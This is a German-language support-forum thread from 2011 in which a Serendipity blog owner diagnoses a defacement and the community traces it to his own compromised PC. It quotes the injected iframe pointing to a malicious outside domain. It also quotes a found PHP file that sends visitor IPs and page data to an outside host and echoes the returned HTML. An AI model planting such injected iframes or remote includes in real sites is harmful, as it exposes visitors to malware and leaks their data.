[Geirrt!] S9Y gehackt?

HadleyB · Post by **HadleyB** » Thu Jul 14, 2011 2:17 pm

Zwei meiner Webseiten, auf denen ich Serendipity betreibe, wurden in der letzten Nacht gehackt. Dabei wurde der Blog selbst nicht verändert, sondern eine "index.htm", die im Root lag (S9Y liegt im Unterverzeichnis CMS) durch den hacker verändert. Dies passierte bei zwei verschiedenen Hostern (Knallhart und MediaOn).

In die "index.htm" wurde, neben dem BODY-Tag, folgender Code eingefügt:

<body bgcolor="#FFFFFF"><iframe src="http://wrangelrian.co.cc/in/in.php"></iframe>
<p>Es geht nicht weiter? Dann bitte <a href="cms/index.php">hier klicken</a>. </p>
</body>

Beiden Hostern ist nichts über eine Sicherheitslücke oder weiteren Hacks auf deren Servern bekannt. Es hat nur meine Webseite getroffen. Aus diesem Grund schieben es beide Hoster auf das S9Y-Script.

Post by **onli** » Thu Jul 14, 2011 4:10 pm

Lief die aktuelle Version von serendipity?

Timbalu · Post by **Timbalu** » Thu Jul 14, 2011 5:30 pm

Außer der sehr berechtigten Frage von Malte könnte man vielleicht auch mit verify
http://board.s9y.org/viewtopic.php?f=4&t=17755
etwas weiteres herausfinden.

HadleyB · Post by **HadleyB** » Thu Jul 14, 2011 9:20 pm

Ja, es läuft immer die aktuellste Version.

Eine Frage:
verifyviewtopic.php?f=4&t=17755

Was soll das sein? Wie funktioniert das? Wo bekomme ich das her?

kleinerChemiker · Post by **kleinerChemiker** » Thu Jul 14, 2011 10:12 pm

Überprüf mal deine PCs auf Viren usw.
Benuttz du ordentliche Paßwörter? Benutzt du das selbe PAßwort bei unterschiedlichen Seiten? ICh denke nicht, daß es S9Y "gehackt" wurde, sondern eher du.

HadleyB · Post by **HadleyB** » Thu Jul 14, 2011 11:59 pm

Es hat auch eine Kundenseite erwischt! Und da ist gar kein S9Y drauf! Es kann also gar nicht der Blog sein.

Danke für Eure Antworten! Anscheinend hab' ich mir etwas eingefangen. Trotz drei(!) Schadsoftscannern (Malwarebytes, Adaware und S&D) und Antivir.

Morgen setze ich meinen Rechner neu auf und ändere sämtliche Zugangspasswörter. Besser is das!

Timbalu · Post by **Timbalu** » Fri Jul 15, 2011 8:06 am

HadleyB wrote:Was soll das sein? Wie funktioniert das? Wo bekomme ich das her?

Es steht alles drin wenn du auf den link drückst, der dich zum Verify thread führt.
Naja, eventuell ist das in deinem Falle auch gar nicht mehr nötig.

HadleyB · Post by **HadleyB** » Fri Jul 15, 2011 10:15 am

Ich habs trotzdem mal gemacht (tolles Plugin!, es wurden auch drei veränderte Dateien gefunden. Die waren aber nicht infiziert.

So scheint S9Y sauber zu sein!

Timbalu · Post by **Timbalu** » Fri Jul 15, 2011 10:26 am

danke.
kannst du die mir 3 angemeckerten mal posten, natürlich nur die Ausgabe mit Datum etc, damit ich sehen kann ob ich sie eventuell auch noch excluden muss.

HadleyB · Post by **HadleyB** » Fri Jul 15, 2011 4:41 pm

Meinst Du so?

Post by **yellowled** » Fri Jul 15, 2011 5:09 pm

Was ist denn mystate.php? Gehört das zu s9y?

YL

HadleyB · Post by **HadleyB** » Fri Jul 15, 2011 6:03 pm

Keine Ahnung, ich habs gelöscht! Das Datum der Datei steht aber auf 07.04.2010. Auf dem anderen gehackten Server ist die nicht drauf.

Code: Select all

<?
$mls_userID = "5687";
$mls_debug = "0"; // Setzen Sie die Variable auf 1 um die Ausgabe zu testen
$mls_html_delim_pre = ""; // Trennzeichen vor dem Link (z.B.: <p> oder » oder ein anderes Zeichen)
$mls_html_delim_post = "<br>"; // Trennzeichen nach dem Link (z.B.: </p> oder ein anderes Zeichen)
$mls_site_encoding = ""; // Website encoding. Z.B.: KOI8-U, UTF-8, iso-8859-1
$mls_page = $_SERVER["REQUEST_URI"];
$mls_remote = $_SERVER["REMOTE_ADDR"];
$mls_url = "http://data.mylinkstate.com/?userID=".$mls_userID."&dom=".$_SERVER["HTTP_HOST"]."&page=".urlencode($mls_page)."&qstr=".urlencode($_SERVER["QUERY_STRING"])."&ip=".$mls_remote."&debug=".$mls_debug."&mls_html_delim_pre=".urlencode($mls_html_delim_pre)."&mls_html_delim_post=".urlencode($mls_html_delim_post)."&mls_site_encoding=".urlencode($mls_site_encoding);
$mls_html = "";

if ( function_exists('curl_init') ) { // check for CURL, if not use fopen
  $ch = curl_init();
  curl_setopt ($ch, CURLOPT_URL, $mls_url);
  curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); 
  curl_setopt	($ch, CURLOPT_TIMEOUT, 2);	
  curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 2);
  curl_setopt ($ch, CURLOPT_LOW_SPEED_LIMIT, 100);
  curl_setopt ($ch, CURLOPT_LOW_SPEED_TIME, 1);
  $mls_html = curl_exec($ch);
  curl_close($ch);
}
else{
  if(@fsockopen("data.mylinkstate.com",80,$errno,$errstr,2)){
    $mls_html=@implode("",file($mls_url));
  }
}

// Output the links
if (strlen($mls_html) && $mls_html != 1){
  echo $mls_html;
}
?>

Timbalu · Post by **Timbalu** » Mon Jul 18, 2011 9:00 am

Danke - Jein..., bitte lösch mal dieses screenshot. Der ist hier unnötig.

serendipity_event_picasa.zip liegt inzwischen in einer aktualisierten version vor, ohne weiter aufzufallen.
die plogpdf/gif.php wurde meiner Ausnahmeliste hinzugefügt.
serendipity_event_verify liegt in einem anderen plugin ordner (recententries) und hat dort ebenfalls nichts zu suchen.

Diese ominöse mystate.php ist ein Service, der bezahlte Links auf Webseites schaltet. Dort musst du dich angemeldet und diese Datei eingefügt haben. Oder hat da dein Hacker etwa persönliche Spuren hinterlassen? Sollte ersteres zutreffen bitte hier etwas anonymisieren!

BTW, @Garvin sourceforge CVS meldet - nur zip geht
An Exception Has Occurred

The root "php-blog" is unknown. If you believe the value is correct, then please double-check your configuration.
HTTP Response Status

404 Not Found

Post by **garvinhicking** » Mon Jul 18, 2011 9:30 am

Hi Timbalu!

Ja, leider betrifft das uns, siehe http://sourceforge.net/apps/wordpress/s ... -projects/

[Geirrt!] S9Y gehackt?

[Geirrt!] S9Y gehackt?

Re: S9Y gehackt?

Re: S9Y gehackt?

Re: S9Y gehackt?

Re: S9Y gehackt?

Re: S9Y gehackt?

Re: S9Y gehackt?

Re: [Geirrt!] S9Y gehackt?

Re: [Geirrt!] S9Y gehackt?

Re: [Geirrt!] S9Y gehackt?

Re: [Geirrt!] S9Y gehackt?

Re: [Geirrt!] S9Y gehackt?

Re: [Geirrt!] S9Y gehackt?

Re: [Geirrt!] S9Y gehackt?